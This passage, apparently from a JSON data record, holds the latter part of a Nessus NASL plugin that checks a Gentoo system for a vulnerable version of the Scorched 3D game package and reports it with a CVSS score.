or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"games-strategy/scorched3d\", unaffected:make_list(\"ge 40\"), vulnerable:make_list(\"le 39.1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Scorched 3D\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}]}